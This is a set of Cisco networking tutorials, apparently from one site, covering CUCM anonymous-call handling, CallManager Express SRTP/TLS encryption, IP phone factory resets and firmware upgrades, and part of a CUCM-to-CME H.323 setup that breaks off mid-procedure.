On another note, NAT Overload is required in most cases to ensure both VLAN networks have Internet access..  This is covered extensively in our Cisco Router NAT Overload article.

Summary

This article provided an in-depth coverage on how to configure a Cisco Aironet 1242AG / 1240 series access point to support multiple SSID wireless networks and connect via 802.1q Trunk link to a local switch.  The information provided not only covers the basic commands, but also analyses the background theory and logic, to ensure the reader fully understands why this configuration method is used.

  • Hits: 110980

How To Stop CallManager (CUCM) 7, 8, 9, 10.5 with MGCP / H.323 Voice Gateway From Rejecting Anonymous (Hidden Caller-ID) Calls

cucm-rejecting-anonymous-caller-id-workaround-1Cisco Unified CallManager (CUCM) and its Voice Gateway relies on the telecommunication provider (telco) to send the correct call details for every incoming call, to allow the system to correctly process it and route it.

One problem many engineers stumble upon is the routing of incoming calls which have their caller-id blocked.  In these cases, quite a few telcos send Anonymous instead of N/A as the Calling Party Number (the number that is calling us), instead of the typical N/A string:

Jan 30 07:42:16.892: ISDN Se0/1/0:15 Q931: RX <- SETUP pd = 8  callref = 0x1075
 Sending Complete      
 Bearer Capability i = 0x8090A3
                Standard = CCITT
                Transfer Capability = Speech 
                Transfer Mode = Circuit
                Transfer Rate = 64 kbit/s
        Channel ID i = 0xA98381
                Exclusive, Channel 1
        Calling Party Number i = 0x0180, 'anonymous'
                Plan:ISDN, Type:Unknown
        Called Party Number i = 0x81, '0298889994'
                Plan:ISDN, Type:Unknown
Jan 30 07:42:16.900: ISDN Se0/1/0:15 Q931: TX -> CALL_PROC pd = 8  callref = 0x9075
        Channel ID i = 0xA98381
                Exclusive, Channel 1
Jan 30 07:42:16.904: ISDN Se0/1/0:15 Q931: TX -> DISCONNECT pd = 8  callref = 0x9075
        Cause i = 0x8095 - Call rejected
Jan 30 07:42:16.912: ISDN Se0/1/0:15 Q931: RX <- RELEASE pd = 8  callref = 0x1075
Jan 30 07:42:16.944: ISDN Se0/1/0:15 Q931: TX -> RELEASE_COMP pd = 8  callref = 0x9075
The problem becomes more difficult to solve when the Voice Gateway is configured to use MGCP (Media Gateway Control Protocol) as the control protocol with CUCM. With MGCP, there is no control in manipulating the Calling Party Number (as opposed to H.323). Despite the fallback, most engineers use MGCP as it dramatically simplifies the configuration on both CUCM and the Voice Gateway.

By default, all CUCM versions from version 6 and above will automatically reject calls when Calling Party Number set to Anonymous, making it impossible for callers with hidden ID to successfully call the company.

Solutions To Stop CUCM From Rejecting Anonymous Caller-IDs

One solution is to request the Telco to replace the Anonymous Calling Party Number with a specific numeric string. Possibilities of this happening, are quite slim.

Another solution is to convert your MGCP Voice Gateway to H.323. This will allow the usage of translation patterns for all incoming calls, and manually changing Anonymous to whatever is required to ensure the call is not rejected.

The final solution is to dive into each Directory Number (DN) and un-tick the Reject Anonymous Calls option, under the Directory Number Settings section. The Reject Anonymous Calls feature is enabled by default and will cause CUCM to reject all anonymous incoming calls:

cucm-rejecting-anonymous-caller-id-workaround-2

When done, simply click Save and your done! Simple - Fast and Effective!

  • Hits: 25955

Secure CallManager Express Communications - Encrypted VoIP Sessions with SRTP and TLS

In this article we discuss about the security and encryption of Cisco Unified Communications Manager Express (CUCME) which is an integral part of Cisco UC; and more so of Cisco Express Call processing regime.

Voice over IP (VoIP) is not just need of hour for most enterprises; it’s something their business depends on to a degree that without IP communications in place, their business processes and revenue streams will fall apart. In such case, it goes without saying; security of voice networks is one of the chief concerns when it comes to security of intellectual capital and customer data. More often than not, one of the first thoughts is how to secure the VoIP network itself which is leveraged by IP Telephony / Unified Communication (UC) applications.

So what is that may be the most commonly sought after yet elusive security control which plays an indispensable role in securing a VoIP network? Your guess is as good as mine, it is encryption! Now, you are well within your rights to ask why elusive? The simple answer is – where encryption can help you succeed and protect the privacy of communications, it can also be detrimental for various functions / organizations e.g. monitoring secure calls is not a trivial task and encrypting all endpoints has an impact on platform sizing and performance.

The use of authentication and encryption helps protect confidentiality and makes it harder for malicious insiders or outsiders from tampering with the signaling and media streams, the CUCME router, and IP phones. When the CUCME security features are enabled i.e. the media streams (SRTP) and call signaling (TLS), the communication between Cisco Unified IP phones and CUCME as well as Phones is encrypted as shown in figure 1:

cisco-voice-cme-secure-voip Figure 1 - CUCME to Cisco IP Phone SRTP and TLS

Let’s go over some of the assumptions, requirements and caveats before we dwell further into CUCME security configuration.

Assumptions For CUCME Encryption

  • It is assumed that CUCME is configured and operational (without security in place); this article only serves to elucidate the process of implementing authentication and encryption on the CUCME
  • It must also be understood that authentication is an integral part of overall security construct when the discussion is around encryption since; authentication provides integrity whereas encryption provides privacy. 

Requirements For CUCME Encryption

  • Enabling CUCME encryption requires Cisco IOS feature set Advanced Enterprise Services (adventerprisek9) or Advanced IP Services (advipservicesk9)
  • CUCME version 4.2 or later is require to provide media encryption
  • Supported platforms include 2800, 2900, 3200, 3800, and 3900 series routers
  • Network Time Protocol (NTP) must be enabled to ensure the certificate dates are correct and to check validity of certificates
  • IOS CA to sign various certificates (on same router as that of CUCME or different router

Caveats For CUCME Encryption

  • Secure three-way software conference is not supported therefore, while in conference, the call falls back to plain RTP. However, if a party drops from a three-party conference, the call between the remaining two parties returns to a secure state (if the two endpoints are configured for encryption)
  • Media and signaling encryption requires the Cisco CTL client service
  • Calls to Cisco Unity Express (CUE) do not support SRTP or TLS for media and signaling respectively
  • Music on Hold (MOH) does not support encryption
  • Modem relay and T.3 fax relay calls not support encryption
  • Secure CUCME does not support Session Initiation Protocol (SIP) trunks and only H.323 trunks are supported (with IPSec for signaling protection)

With above in mind, let’s take a deep dive into the enablement of security (Encryption, Authentication) for Cisco Unified IP Phones on CUCME.

Enabling SRTP & TLS On CUCME For Endpoints

Alike any PKI hierarchy, enabling encryption (and authentication) on CUCME requires the use of a Certificate Authority (CA) server/process. CA can be configured on the same router on which CUCME application is running or it can be a different IOS router (dedicated to CA function in an organization). The major function of CA for CUCME security is to provide certificates, duration for which certificates are valid, and trust-relationship between different entities by virtue of certificates.

 Configuring IOS Certificate Authority (CA)

The following commands are required to configure the IOS CA. For the following example, we are enabling the CA on the same router as that of CUCME.

First we must ensure that the HTTP server on the router is enabled since, by default port 80 (TCP) will be used for granting certificates and for accepting certificate signing requests by IOS CA.

CUCME(config)# ip http server

Now, we need to configure the CA process and enable CA process:

CUCME(config)# crypto pki server CA
CUCME(ca-server)# database level complete
CUCME(ca-server)# database url nvram:
CUCME(ca-server)# grant auto
CUCME(ca-server)# lifetime certificate 1095
CUCME(ca-server)# lifetime ca-certificate 1095
CUCME(ca-server)# no shutdown

Finally define the CA trustpoint and define (globally) enrollment URL:

CUCME(config)# crypto ca trustpoint CA
CUCME(ca-trustpoint)# enrollment url http://10.10.10.1:80
CUCME(ca-trustpoint)# revocation-check none

At this time, we are done with CA server definition. Next step is to start defining the various certificates which will be used for CUCME security processes (CME, TFTP, CAPF and so on).

Generate Certificates For Enabling Security

A number of certificates must be generated by creating a trustpoint and enrolling it with the CA for enabling various security processes on CUCME. Although CUCME supports leveraging a single trustpoint for all certificate functions, it is a leading practice recommendation to have different trust points for different certificate functions so, it is easier to manage different certificate expiry, revocation, regeneration and so on.

The different certificates required for SRTP and TLS are:

  • CUCME
  • TFTP
  • CAPF
  • SAST tokens

Creating a Certificate For CUCME, TFTP, CAPF, SAST1 & SAST2 Processes

Following commands outline the process to generate the certificate for the secure CME function:

CUCME(config)# crypto pki trustpoint CUCME
CUCME(ca-trustpoint)# enrollment url http://10.10.10.1:80
CUCME(ca-trustpoint)# revocation-check none
CUCME(ca-trustpoint)# rsakeypair CUCME

The next step to creating the certificate is to authenticate and enroll the trust point with the Certificate Authority.

Note: Each of the command i.e. trustpoint authenticate and enroll provide interactive prompts. Extraneous output has been omitted

Authenticating CUCME trustpoint & Enrolling CUCM Trustpoint:

CUCME(config)# crypto pki authenticate CUCME
<output omitted>
% Do you accept this certificate? [yes/no]: yes
Trustpoint CA certificate accepted.

CUCME(config)# crypto pki enroll CUCME
% Start certificate enrollment ..
<output omitted>
Password: *******
Re-enter password: *******
<output omitted>
Request certificate from CA? [yes/no]: yes
% Certificate request sent to Certificate Authority

 Next, we define the other trsutpoints, authenticate and enroll them with Certificate Authority.

TFTP Trustpoint definition:

CUCME(config)# crypto pki trustpoint TFTP
CUCME(ca-trustpoint)# enrollment url http://10.10.10.1:80
CUCME(ca-trustpoint)# revocation-check none
CUCME(ca-trustpoint)# rsakeypair TFTP

 Authenticating and enrolling TFTP trustpoint:

CUCME(config)# crypto pki authenticate TFTP
<output omitted>
!
CUCME(config)# crypto pki enroll TFTP
<output omitted>

 CAPF Trustpoint definition:

CUCME(config)# crypto pki trustpoint CAPF
CUCME(ca-trustpoint)# enrollment url http://10.10.10.1:80
CUCME(ca-trustpoint)# revocation-check none
CUCME(ca-trustpoint)# rsakeypair CAPF

 Authenticating and enrolling CAPF trustpoint:

CUCME(config)# crypto pki authenticate CAPF
<output omitted>
!
CUCME(config)# crypto pki enroll CAPF
<output omitted>

 SAST1 Trustpoint definition:

CUCME(config)# crypto pki trustpoint SAST1
CUCME(ca-trustpoint)# enrollment url http://10.10.10.1:80
CUCME(ca-trustpoint)# revocation-check none
CUCME(ca-trustpoint)# rsakeypair SAST1

 Authenticating and enrolling SAST1 trustpoint:

CUCME(config)# crypto pki authenticate SAST1
<output omitted>
!
CUCME(config)# crypto pki enroll SAST1
<output omitted>

SAST2 Trustpoint definition:

CUCME(config)# crypto pki trustpoint SAST2
CUCME(ca-trustpoint)# enrollment url http://10.10.10.1:80
CUCME(ca-trustpoint)# revocation-check none
CUCME(ca-trustpoint)# rsakeypair SAST2

Authenticating and enrolling SAST2 trustpoint:

CUCME(config)# crypto pki authenticate SAST2
<output omitted>
!
CUCME(config)# crypto pki enroll SAST2
<output omitted>

Enabling CAPF server on CUCME
Alike CUCM, Certificate Authentication Proxy Function (CAPF) server is accountable for issuing CTL signed Locally Significant Certificates (LSC). Following commands enable CAPF server on CUCME.

CUCME(config)# capf-server
CUCME(config-capf-server)# trustpoint-label CUCME
CUCME(config-capf-server)# cert-enroll-trustpoint CA password 0 cisco123
CUCME(config-capf-server)# phone-key-size 1024
CUCME(config-capf-server)# port 3084
CUCME(config-capf-server)# auth-mode null-string
CUCME(config-capf-server)# source-addr 10.10.10.1

Invoking IOS CTL Client 
The final step, before an e-phone can be configured for encryption and authentication is to enable Certificate Trust List (CTL) client on CUCME. CTL client helps sign the list of servers which can be trusted by a Cisco IP Phone with the certificates generated earlier – CUCME, TFTP, CAPF and so on.

The IP Phone will download the CTL file via TFTP and store the file on the phone. This is analogous to CUCM CTL and CTL client must be configured explicitly on IOS leverage the various certificates.

CUCME(config)# ctl-client
CUCME(config-ctl-client)# server cme 10.10.10.1 trustpoint CUCME
CUCME(config-ctl-client)# server tftp 10.10.10.1 trustpoint TFTP
CUCME(config-ctl-client)# server cme 10.10.10.1 trustpoint CAPF
CUCME(config-ctl-client)# sast1 trustpoint SAST1
CUCME(config-ctl-client)# sast2 trustpoint SAST2
CUCME(config-ctl-client)# regenerate

Configuring Telephony-Service To Leverage Security

CUCME support configuring endpoints for SRTP (media) and TLS (signaling). Once, the aforementioned steps are concluded, CUCME needs to be configured to use the defined certificates for different functions. The following commands in telephony-service mode helps enable authenticated TFTP file transfer and TLS for signaling.

CUCME(config)# telephony-service
CUCME(config-telephony)# secure-signaling trustpoint CUCME
CUCME(config-telephony)# tftp-server-credentials trustpoint TFTP
CUCME(config-telephony)# server-security-mode secure
CUCME(config-telephony)# cnf-file perphone
CUCME(config-telephony)# cnf-file location flash:

Configuring Endpoints (E-Phones) For Security

The final step is to configure the e-phones for security mode. Now, there are two ways to configure the e-phones for security mode. Those two ways are as follows:

  • Configure e-phone (device) security at global mode for all supported phone models
  • Configure e-phone (device) security mode on a device by device basis


Configuring Device Security at Global Level
To enable security at global level in CUCME for all Cisco IP Phones which support encryption and authentication, issue the following commands in global configuration mode:

CUCME(config)# telephony-service
CUCME(config-telephony)# device-security-mode [authenticated | encrypted]
CUCME(config-telephony)# load-cfg-file flash:<filename> alias <alias> sign create
CUCME(config-telephony)# reset all

Configuring Device Security per Device Basis
In certain cases, it may be required to apply encryption to some, authentication to other devices, and no security to the rest of the phones. In such case, for each e-phone commands can be entered at e-phone level, on phone by phone basis.

Following series of commands can issued to enable security on phone by phone basis:

CUCME(config)# ephone 110
CUCME(config-ephone)# mac-address 1234.1234.1234
CUCME(config-ephone)# device-security-mode [none | authenticated | encrypted]
CUCME(config-ephone)# cert-oper upgrade auth-mode null-string
CUCME(config-ephone)# reset

About the Author

Akhil Behl is a Solutions Architect with Cisco Advanced Services, focusing on Cisco Collaboration and Security Architectures. He leads collaboration and security projects worldwide for Cisco Advanced Services and the Collaborative Professional Services (CPS) portfolio. Prior to his current role, he spent ten years working in various roles at Linksys as a Technical Support Lead, as an Escalation Engineer at Cisco Technical Assistance Center (TAC), and as a Network Consulting Engineer in Cisco Advanced Services. Akhil has a bachelor of technology degree in electronics and telecommunications from IP University, India, and a master’s degree in business administration from Symbiosis Institute, India.

Summary

Cisco Unified Communications Manager Express (CUCME) is an indispensible component of Cisco’s UC Express portfolio and has CUCM like capabilities. Moreover, CUCME can provide enterprise wide security by empowering you to enable media and signaling encryption between CUCME and Phones. This article outlines the capabilities of CUCME to support encryption and authentication for phone calls and signaling. The process to enable and pull together CUCME security may seem daunting at first however; it is a onetime configuration and can go a long way in safeguarding an organization’s voice channels.

CUCME(config)# crypto pki server CA

CUCME(ca-server)# database level complete

CUCME(ca-server)# database url nvram:

CUCME(ca-server)# grant auto

CUCME(ca-server)# lifetime certificate 1095

CUCME(ca-server)# lifetime ca-certificate 1095

CUCME(ca-server)# no shutdown
  • Hits: 54079

Cisco SPA525G / SPA525G2 User Guide Free Download

Available as a free download in our Cisco Small Business Series Product Datasheet section is the Cisco SPA525G / SPA525G2 User Guide. This 68 page user guide contains all the necessary information on how to setup, configure and customise your Cisco SPA525 IP phone.

Topics covered include:

  • Getting started
  • Understanding your phone lines and buttons
  • Using the keypad, buttons and menus
  • Using the Cisco Attendant Console
  • Connecting your IP phone to the network
  • Updating firmware
  • Phone functions (calling, volume, call-on-hold, live call, call pick-up, phone directories, call history lists, transfering calls and much more)
  • Advanced phone functions (pairing SPA525 with bluetooth device, mobile phone battery and signal info on your SPA525, playing mp3 files, play lists and more)
  • Configuring IP phone screen (contrast, brightness, wallpaper, screensaver)
  • Viewing network information
  • ...and much more!

Download your free copy by visiting the Firewall.cx Cisco Small Business Series Product Datasheet section.

  • Hits: 21793

Cisco Small Business SPA500 IP Phone Series Administration Guide Free Download

Firewall.cx readers can now access and freely download the Cisco Small Business Administration Guide for Cisco SPA500 series IP phones

The Administration Guide for Cisco SPA500 series IP phone covers basic and advanced configuration of the following IP phones:
SPA301, SPA303, SPA501G, SPA502G, SPA504G, SPA508G, SPA509G, SPA512G, SPA514G, SPA525G, SPA525G2 and WIP310 model.

Features covered in this extensive 332-page guide include:

  • Getting the IP phones to work with the Cisco SPA900 IP PBX
  • Network Configuration
  • Determining and Upgrading your IP phone firmware
  • Web-Based Configuration Utility - Allowing web-access to the IP phone
  • Configuring Line Key (shares-lines, call appearance, access services, busy lamp, call-pickup, speed dials and much more)
  • Customizing the IP phone (background image, screen save, LCD brightness, backlight settings)
  • Enabling Call Features ( Caller ID Bocking Services, call-back service, call transfer, conferencing, do-not-disturb)
  • Customizing phone softkeys
  • Configuring ring tones
  • Configuring audio settings
  • Configuring Bluetooth (Cisco SPA525G / SPA525G2 only)
  • Enabling SMS
  • Configuring LDAP for Cisco SPA300 and SPA500 series IP phones
  • Configuring SIP (Basic parameters, RTP parameters, SIP settings)
  • Managing NAT Transversal with Cisco IP phones
  • Configuring Security, Quality and Network Features
  • Configuring VLAN settings
  • Configuring Dial Plans (Digit Sequences, examples, off-hook timers and more)
  • and much more!

To download the Cisco Small Business Administration Guide for Cisco SPA500 series IP phones, simply visit our new Cisco Small Business Series Product Datasheet download section.

  • Hits: 22892

Free Cisco IP Phone & ATA Firmware (SCCP & SIP) Download Section

Firewall.cx readers can now download free Cisco firmware files for all Cisco IP Phones & Cisco ATA devices. Our new Cisco IP Phone & ATA Firmware Download section contains the latest SCCP (Skinny Protocol) and SIP files for immediate download.

As with all Firewall.cx downloads, no registration is required.

Firmware available currently covers the following Cisco IP phone & ATA models:

  • 7906 & 7911
  • 7910
  • 7912
  • 7914
  • 7915
  • 7916
  • 7920
  • 7921
  • 7925
  • 7926
  • 7931
  • 7935
  • 7936
  • 7937
  • 7940 & 7960
  • 7941 & 7961
  • 7942 & 7962
  • 7945 & 7965
  • 7970 & 7971
  • 7975
  • 7985
  • 8941 & 8945
  • 8961
  • 9951
  • 9971
  • ATA-186
  • ATA-187
  • ATA-188
  • Hits: 172467

IP Phone 7900 Series (7940, 7941, 7942, 7960, 7961, 7962, 7920) Factory Reset Procedure & Password Recovery

cisco-phone-79xx-factory-reset-01This article explains how to reset your Cisco 7940, 7941, 7942, 7960, 7961, 7962 & 7920 IP phone to factory defaults, and how to upgrade its firmware to the latest available version.

When initiating a factory reset procedure certain information from the IP phone is erased while other information is reset to its factory default value as shown in the list below:

 Information Erased:

  • CTL File (Certificate Trust List)
  • LSC File (Locally Significant Certificate)
  • IP Phone Call History (Calls Received, Placed, Missed etc)
  • Phone application

Information Reset to Default:

  • User configuration settings (ring tone, screen brightness, sound levels etc)
  • Network configuration settings

It is highly advisable to follow the firmware upgrade procedure in a non-working environment to ensure other phones are not affected (in case of an accidental IP phone reboot) and to avoid the freshly factory reset ip phones obtaining the working environment’s settings.

Firewall.cx readers can visit our free Cisco IP Phone & ATA Firmware Download section to freely download the latest available firmware for their Cisco IP Phones. To learn how to configure your CallManager Express system for firmware upgrade, please read our Configuring CallManager Express (CME) for IP Phone Firmware Upgrade article 

Things To Consider Before Factory Resetting Your Cisco IP Phone

When performing the factory reset procedure we are about to describe, it is important to keep in mind that the IP phone will lose all configuration files and phone applications. This means that it is necessary to have CallManager or CallManager Express setup so that the IP phone will be able to receive the new information (phone application and configuration) after the reset procedure is complete, otherwise it is most likely  that the IP phone will not be usable until this information is loaded on to it.

This preparation also happens to be the procedure for upgrading a Cisco IP phone firmware.

Performing the Factory Reset On Cisco 7940, 7960 IP Phones

Follow the steps below to successfully factory reset your Cisco 7940, 7960 IP phone:

  1. Unplug the power cable from the ip phone and then plug it back in.
  2. Immediately press and hold # and when the Headset, Mute and Speaker buttons begin to flash in sequence, release the # button.
  3. At this point, you’ll notice the Headset, Mute and Speaker buttons flash in sequence, indicating that the ip phone is waiting for you to enter the reset sequence.
  4. Press 123456789*0#  to begin the reset. If you accidently press a key within the sequence twice e.g 1123456789*0#, the ip phone will still accept the code and begin the reset. If an invalid key is pressed, the phone will continue its normal startup procedure.
  5. Once the correct key sequence is entered, the ip phone will display the following prompt:  Keep network cfg? 1 = yes 2 = no 
  6. To maintain the current network configuration settings for the phone when the phone resets, press 1. To reset the network configuration settings when the phone resets, press 2. If you press another key or do not respond to this prompt within 60 seconds, the phone continues with its normal startup process and does not reset. Otherwise, the phone goes through the factory reset process.

Performing The Factory Reset On Cisco 7941, 7961 IP Phones

Follow the steps below to successfully factory reset your Cisco 7941, 7961 IP phone:

  1. Unplug the power cable from the ip phone and then plug it back in.
  2. Immediately press and hold # and when the Headset, Mute and Speaker buttons begin to flash in sequence, release the # button.
  3. At this point, you’ll notice the Headset, Mute and Speaker buttons flash in sequence, indicating that the ip phone is waiting for you to enter the reset sequence.
  4. Press 123456789*0#  to begin the reset. If you accidently press a key within the sequence twice e.g 1123456789*0#, the ip phone will still accept the code and begin the reset. If an invalid key is pressed, the phone will continue its normal startup procedure.
  5. Once the correct key sequence is entered the ip phone will display the following prompt and begins its reset process:  Upgrading

Performing The Factory Reset On Cisco 7942, 7962 IP Phones

Follow the steps below to successfully factory reset your Cisco 7942, 7962 IP phone:

  1. Unplug the power cable from the phone and then plug it back in. The phone begins its power up cycle.
  2. While the phone is powering up, and before the Speaker button flashes on and off, press and hold #. Continue to hold # until each line button flashes on and off in sequence in amber.
  3. Release # and press 123456789*0#.

You can press a key twice in a row, but if you press the keys out of sequence, the factory reset will not take place.

After you press these keys, the line buttons on the phone flash red and the phone goes through the factory reset process.

Do not power down the phone until it completes the factory reset process and the main screen appears.

Performing The Factory Reset On Cisco 7920 Wireless IP Phone

To reset a Cisco 7920, the ip phone must be started in administration mode using the following steps:

  1. Press the Menu softkey
  2. Press * (star), # (hash) and * (star) again.
  3. Press the Green phone key (used to answer a call) to open the administration mode.

Note: Power cycle the phone or press any of these keys while in the first level submenu and then press the Green phone key to hide the options:

  • any key between 0 and 9
  • * (star) key
  • # (hash) key

Follow the steps below to successfully factory reset your Cisco 7920 IP phone:

  1. Choose Menu > Phone Settings > Factory Default.
  2. The phone displays the Restore to Default? message. Press the OK softkey. All settings are deleted.
  3. Choose Menu > Network Config in order to reconfigure the network settings for your WLAN.

This completes the factory reset procedure for all Cisco 7940, 7941, 7942, 7960, 7961, 7962 and 7920 IP phones.

  • Hits: 320019

CallManager Express Setup for IP Phone Firmware Upgrade - How to Upgrade Your Cisco IP Phone Firmware

This article will show how to configure CallManager Express (CME) for the IP phone firmware upgrade process. Upgrading your Cisco IP phones is generally a good practice, especially when upgrading your CallManager or CallManager Express version, as it will ensure all new options and features supported by your CallManager/CME system are also available to your IP phones.

Upgrading your Cisco IP phone firmware is a very simple process, however special consideration must be taken into account when upgrading to the latest firmware.

If the Cisco Unified IP phone is currently running firmware earlier than 6.0(2) on and you want to upgrade to 8.x(x), you must first install an intervening 7.0(x) load to prevent upgrade failure.

Cisco recommends using the most recent 7.0(3) load as the intervening load to avoid lengthy upgrade times.

If the Cisco Unified IP phone is currently running firmware 6.0(2) to 7.0(2) and you want to upgrade to 8.x(x), you can do so directly. However, expect the upgrade to take twice as long as usual.

Step 1: Download The Correct Firmware

To download Cisco IP Phone firmware from Cisco.com, a valid Cisco CCO account is required. In most cases, the firmware file name is something similar to the following:  cmterm-7945_7965-sccp.9-2-1.tar.  From the file name, we can understand that this is firmware version 9.2.1, for Cisco 7945 and 7965 SCCP IP phones.

Firewall.cx readers can visit our free Cisco IP Phone & ATA Firmware Download section to freely download the latest available firmware for their Cisco IP phones.

Step 2: Upload Firmware Files To CallManager Express Flash Storage

Next, the firmware must be uploaded and unpacked on our CME router. For this, we’ll need a TFTP server running on a workstation, plus access to the CME router.  From the CME prompt, we instruct the router to download the firmware and unpack it onto our CME flash:

R1# archive tar /xtract tftp://10.0.0.10/cmterm-7945_7965-sccp.9-2-1.tar flash:
Loading cmterm-7945_7965-sccp.9-2-1.tar from 10.0.0.10 (via FastEthernet0/0): !
extracting apps45.9-2-1TH1-13.sbn (4639974 bytes)!!!!!!!!!!!!!!!!!!
extracting cnu45.9-2-1TH1-13.sbn (575590 bytes)!!
extracting cvm45sccp.9-2-1TH1-13.sbn (2211969 bytes)!!!!!!!!!
extracting dsp45.9-2-1TH1-13.sbn (356907 bytes)!
extracting jar45sccp.9-2-1TH1-13.sbn (1886651 bytes)!!!!!!!
extracting SCCP45.9-2-1S.loads (656 bytes)
extracting term45.default.loads (660 bytes)
extracting term65.default.loads (660 bytes)
[OK - 9680896 bytes]

When complete, the system’s flash should contain all 8 files as shown above.

Step 3: Configure The CallManager Express TFTP Server To Serve The Firmware Files & Setup DHCP Server (option 150)

Now we must configure CME’s tftp server to ‘serve’ these files so that the IP phones can request them.  This is done by adding the following commands to the router’s configuration:

R1(config)# tftp-server flash:apps45.9-2-1TH1-13.sbn
R1(config)# tftp-server flash: cnu45.9-2-1TH1-13.sbn
R1(config)# tftp-server flash: cvm45sccp.9-2-1TH1-13.sbn
R1(config)# tftp-server flash: dsp45.9-2-1TH1-13.sbn
R1(config)# tftp-server flash: jar45sccp.9-2-1TH1-13.sbn
R1(config)# tftp-server flash: SCCP45.9-2-1S.loads
R1(config)# tftp-server flash: term45.default.loads
R1(config)# tftp-server flash: term65.default.loads

We also must ensure there is a valid DHCP server running with option 150 set to CME’s IP address. When the IP phone boots up, it will look for a DHCP server that will provide it with an IP address, but also expect to find DHCP option 150 which designates the CME the phone should try to register with:

ip dhcp excluded-address 10.0.0.1  10.0.0.15
!
ip dhcp pool Firewall.cx
 network 10.0.0.0 255.255.255.0
 dns-server 10.0.0.1 8.8.8.8
 default-router 10.0.0.1
 option 150 ip 10.0.0.1

The above configuration excludes IP address ranges 10.0.0.1 to 10.0.0.15 from being handed out by the DHCP server. It also creates a DHCP scope named Firewall.cx and configures various self-explanatory parameters including the critical DHCP option 150, which represents the CME the IP phone should try to register to.

Step 4 – Configure CallManager Express To Use New Firmware Upon Next IP Phone Bootup

The final step involves configuring CME to use the new firmware and instruct IP phones to download it. This is done by issuing the following commands under the telephony-service section of CME:

R1(config)# telephony-service
R1(config-telephony)# load 7945 SCCP45.9-2-1S
R1(config-telephony)# create cnf
Creating CNF files...

The load command is followed by the phone type and associated firmware (.load) file. Notice we do not add the .loadof the filename at the end of the command.

The create cnf command instructs CME to recreate the XML files that will be used by the IP phones to download all necessary network parameters and force it to check its firmware and begin downloading the new one.

This completes our article on configuring Cisco CallManager Express for Cisco IP Phone Firmware upgrade.



  • Hits: 138258

How to Register Cisco IP Phones & Connect CallManager (CUCM) Cluster with CME or UC520, UC540. UC560 via H.323 Gateway

This article shows how to connect Cisco's Unified CallManager with a CallManager Express system (including UC520, UC540 and UC560) via H323 gateway, allowing the two systems to route calls between each other. This scenario is typically used between remote offices running CallManager Express that need to connect to their Headquarters running on CallManager.

Our example network assumes there is a direct connection between the two CallManager systems via leased line as shown in the diagram below:

connecting Cisco CUCM with CallManager Express via h323 trunk

Engineers who wish to establish a VPN connection instead (via Internet) can refer to the following popular VPN articles:

The above network diagram was designed using GNS3 in a simulated environment consisting of two CallManager clusters, one at the Headquarters (CUCM) with an IP Communicator client (CIPC_HQ) assigned with extension 2002 and at the remote branch we have a CallManager Express system with an IP Communicator client (CIPC_BR) with extension 5010.

To simplify things, our CME router is directly connected with the Headquarters router (CUCM_HQ), providing a path for us to reach the main CallManager (192.168.10.11).

While CallManager (Headquarters) requires a voice gateway to make and receive calls on the PSTN/ISDN network (Telco Providers), it is not a requirement for intra-site communication.

We assume no configuration exists on the CME router and basic configuration on CallManager.

Configuring CallManager Express or UC500 Series System

Following is the CallManager Express router configuration covering its LAN and WAN configuration:

interface FastEthernet0/0
 ip address 192.168.20.1 255.255.255.0
 duplex half
 h323-gateway voip interface
 h323-gateway voip bind srcaddr 192.168.20.1
!
interface Serial1/0
 ip address 172.16.1.2 255.255.255.252
 serial restart-delay 0
!
ip route 0.0.0.0 0.0.0.0 172.16.1.1

The h323-gateway voip interface and h323-gateway voip bind srcaddr commands define the source interface and IP address for all h323 protocol communications and is necessary to ensure VoIP communication with CUCM.

Next, we enable the CallManager Express service and configure our single IP phone (IP Communicator) that will be used for our test:

!
telephony-service
 max-ephones 1
 max-dn 1
 ip source-address 192.168.20.1 port 2000
 auto assign 1 to 1
 max-conferences 4 gain -6
 transfer-system full-consult
 create cnf-files version-stamp Jan 01 2002 00:00:00
!
ephone-dn  1  dual-line
 number 5010
!
ephone  1
 no multicast-moh
 mac-address 000C.296C.C0C4
 keepalive 30 auxiliary 0
 type CIPC
 button  1:1
!

The CallManager Express service is enabled via the telephony-service and the important ip source-address subcommand, which defines the source IP address of the CallManager Express system. In case the CME router has multiple interfaces connected to various networks (VLANs), we set the source IP address to be that of the Voice VLAN, so the CME router will use the correct interface (and therefore source IP address) to communicate with its clients (IP phones).

To register our IP Communicator with CME, we create an ephone directory number (ephone-dn) which creates the extension number and ephone entry that represents our physical IP phone (via its MAC address). Those wanting more information on how extensions are mapped to physical IP phones can visit our Cisco CallManager Express Basic Concepts - Part 2 article.

With the above configuration complete, the IP Communicator phone should register on CME and receive its extension. Keep in mind that it is necessary to configure the TFTP Server IP address to that of the CME under the Preferences > Network settings in IP Communicator.

Finally, all that is left is to configure a dial-peer that would direct all calls to CallManager at our Headquarters. This is done by using dial-peers as shown below:

dial-peer voice 1 voip
destination-pattern 2...
 session target ipv4:192.168.10.11

This dial-peer instructs CallManager Express to forward any calls made to any four digit number starting with 2, e.g. 2000, 2452, 2900 etc, to IP address 192.168.10.11, our headquarters CallManager.

Dial-peers are an essential ingredient to managing outgoing and incoming calls and will be covered in greater depth in another article.

This completes our CallManager Express configuration. We are now ready to move on to our CallManager configuration

Configuring CallManager (CUCM)

Configuring CallManager involves a number of easy-to-follow steps as outlined below. As shown in the network map, we've assigned extension number 2002 to the IP Communicator connected to the system. This phone will be accepting incoming calls from the remote CallManager Express system.

First step is to check that the Cisco CallManager and Cisco TFTP Server are activated. This can be done by visiting Cisco Unified Serviceability > Tools > Service Activation as shown below:

Cisco cucm enable tftp option 150

Here we will need to enable the mentioned CM Services by selecting them and clicking on Save.

If IP Communicator is not already connected and registered to CallManager, we can automate this process by going to Cisco Unified CM Administrator > System > Cisco Unified CM Configuration:

Here, uncheck the box Auto-registration Disabled on this Cisco Unified Communications Manager. This will allow any IP phone (CIPC - IP Communicator in our case) to register and automatically assign them an extension.  This is a very easy and painless method to register IP phones on a CallManager system.

Now to configure CIPC with extension 2002, we go to Device > Phones > Add New> Phone Type  and select Cisco IP Communicator.

Next, go to Device Name (Select the MAC address of CIPC), and for the field Softkey Template select Standard CIPC SCCP:

Cisco cucm ip phone configuration

Scrolling down the page, you'll come across the SUBSCRIBE Calling Search Space field. Click on it and select Cisco IP Communicator:

cisco-voice-cucm-cme-4

Click on save then choose Directory Number Configuration, enter 2002 or desired extension then reset the phone to allow the successfuly registration of CIPC with CallManager:

cisco-voice-cucm-cme-5

Setting Up H.323 Gateway on CallManager

With the IP phone registered we now need to setup the H.323 gateway.

Setting up an H.323 gateway in CallManager is a straightforward process. From the main menu, select: Device > Gateways > Add New > Gateway Type  and select H.323 Gateway.

